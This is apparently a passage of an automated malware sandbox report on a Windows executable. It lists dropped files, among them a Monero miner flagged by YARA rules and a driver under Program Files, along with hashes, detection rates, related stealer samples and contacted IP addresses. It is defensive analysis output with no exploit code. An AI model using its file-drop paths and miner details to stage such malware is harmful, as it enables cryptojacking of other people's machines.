                                              • 54.14.53.253
                                              SecuriteInfo.com.Trojan.GenericKDZ.105649.13827.32664.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                              • 18.215.135.32
                                              SecuriteInfo.com.Trojan.GenericKDZ.105649.30549.11143.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                              • 34.195.9.80

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Program Files\Google\Libs\WR64.sysHEzzgzqOfv.exeGet hashmaliciousXmrigBrowse
                                                FV0mIIfKwQ.exeGet hashmaliciousAmadey, RisePro Stealer, SmokeLoader, StealcBrowse
                                                  google-chrome-stable_x86_64-patch.v0.533.exeGet hashmaliciousXmrigBrowse
                                                    AffoeAIM.exeGet hashmaliciousPureLog Stealer, XmrigBrowse
                                                      SecuriteInfo.com.Trojan.Siggen25.64233.10125.12605.exeGet hashmaliciousXmrigBrowse
                                                        FxeLOSQQNf.exeGet hashmaliciousXmrigBrowse
                                                          AvzR5wP0YM.exeGet hashmaliciousXmrigBrowse
                                                            1FTe3IQdAZ.exeGet hashmaliciousXmrigBrowse
                                                              Bbd9GbGTz6.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, XmrigBrowse
                                                                hpNwtEJWBl.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                  C:\Windows\Temp\wbiwcikhpmwr.tmpfile.exeGet hashmaliciousXmrigBrowse
                                                                    file.exeGet hashmaliciousGlupteba, SmokeLoader, Stealc, XmrigBrowse
                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                        kwF74BLoxA.exeGet hashmaliciousGlupteba, Petite Virus, SmokeLoader, Socks5Systemz, XmrigBrowse
                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                            GWNK2KJZ1G.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse
                                                                              SecuriteInfo.com.Trojan.MulDropNET.43.27711.8559.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                SecuriteInfo.com.Trojan.MulDropNET.43.21623.5556.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                  upw82ArDKW.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, XmrigBrowse
                                                                                    BjKYLUw8UN.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Program Files\Google\Libs\WR64.sys

                                                                                      Download File
                                                                                      Process:C:\Program Files\MINA\m.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):14544
                                                                                      Entropy (8bit):6.2660301556221185
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: HEzzgzqOfv.exe, Detection: malicious, Browse
                                                                                      • Filename: FV0mIIfKwQ.exe, Detection: malicious, Browse
                                                                                      • Filename: google-chrome-stable_x86_64-patch.v0.533.exe, Detection: malicious, Browse
                                                                                      • Filename: AffoeAIM.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Trojan.Siggen25.64233.10125.12605.exe, Detection: malicious, Browse
                                                                                      • Filename: FxeLOSQQNf.exe, Detection: malicious, Browse
                                                                                      • Filename: AvzR5wP0YM.exe, Detection: malicious, Browse
                                                                                      • Filename: 1FTe3IQdAZ.exe, Detection: malicious, Browse
                                                                                      • Filename: Bbd9GbGTz6.exe, Detection: malicious, Browse
                                                                                      • Filename: hpNwtEJWBl.exe, Detection: malicious, Browse
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files\MINA\m.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5827072
                                                                                      Entropy (8bit):7.715684778151957
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:jtFdnoyNMWDUWe4HVEceiM9N7/FErSxMC504f+18:j7+yKIU6VEceiSp/mSxL5JB
                                                                                      MD5:7E78C4388E398CD5113BE95855753C9A
                                                                                      SHA1:ED6ABDCCF206689D48CC1ADAC47A3A71B100D822
                                                                                      SHA-256:7FDCF0389689AE53B0EE7A302DC69963E7F5B3CE911B772792689B05D7F02F67
                                                                                      SHA-512:D18F52399BE73636212C88A450022B78232480798AC6E66B73063589A2FDAC684AF0C7336A5225DE7270C5DF1E2D7CD988B1CBC616C24BB09F5359151B31FE54
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 53%
                                                                                      • Antivirus: Virustotal, Detection: 62%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.d............`Y.0...........................`.X.(...................."Y.P............................text...............................`..`.data.....V.......V.................@....rdata...9....X..:...vX.............@..@.pdata..d.....X.......X.............@..@.xdata........X.......X.............@..@.bss.... .....Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................X..............@..........

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05m4eghi.rkd.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pejivkk3.f1b.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdndcpwo.ca3.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxvi5v3g.euw.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Preview:@...e...........................................................

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_3cjkzcdr.gsr.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_5qpo30es.f3q.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_b0trplnt.ui4.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_dkbj4sxr.3ic.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_fevc0hqu.4t1.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_n4zuio5h.qkx.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_r210lvfk.x0a.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_roknycjf.gz3.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_wjy2avl1.xl4.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_ykux01k3.jc5.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_ys3s0ds1.5qm.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\__PSScriptPolicyTest_zbwlbycd.yvm.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\Temp\wbiwcikhpmwr.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\MINA\m.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5536256
                                                                                      Entropy (8bit):6.689058470432344
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                      MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                      SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                      SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                      SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: Joe Security
                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: unknown
                                                                                      • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: Florian Roth
                                                                                      • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\wbiwcikhpmwr.tmp, Author: ditekSHen
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 64%
                                                                                      • Antivirus: Virustotal, Detection: 74%, Browse
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: kwF74BLoxA.exe, Detection: malicious, Browse
                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                      • Filename: GWNK2KJZ1G.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Trojan.MulDropNET.43.27711.8559.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Trojan.MulDropNET.43.21623.5556.exe, Detection: malicious, Browse
                                                                                      • Filename: upw82ArDKW.exe, Detection: malicious, Browse
                                                                                      • Filename: BjKYLUw8UN.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                      Entropy (8bit):7.715684778151957
                                                                                      TrID:
                                                                                      • Win64 Executable (generic) (12005/4) 74.95%
                                                                                      • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                      • DOS Executable Generic (2002/1) 12.50%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                      File name:SecuriteInfo.com.Win64.Evo-gen.32403.24162.exe
                                                                                      File size:5'827'072 bytes
                                                                                      MD5:7e78c4388e398cd5113be95855753c9a
                                                                                      SHA1:ed6abdccf206689d48cc1adac47a3a71b100d822
                                                                                      SHA256:7fdcf0389689ae53b0ee7a302dc69963e7f5b3ce911b772792689b05d7f02f67
                                                                                      SHA512:d18f52399be73636212c88a450022b78232480798ac6e66b73063589a2fdac684af0c7336a5225de7270c5df1e2d7cd988b1cbc616c24bb09f5359151b31fe54
                                                                                      SSDEEP:98304:jtFdnoyNMWDUWe4HVEceiM9N7/FErSxMC504f+18:j7+yKIU6VEceiSp/mSxL5JB
                                                                                      TLSH:5946E037C6712C9CF27E077AB9C4931446E3F6F543A7FB0F22A498669428B867E1914C
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e...............&......X................@.............................pY.......Y...`... ............................

                                                                                      File Icon

                                                                                      Icon Hash:00928e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x1400014b0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
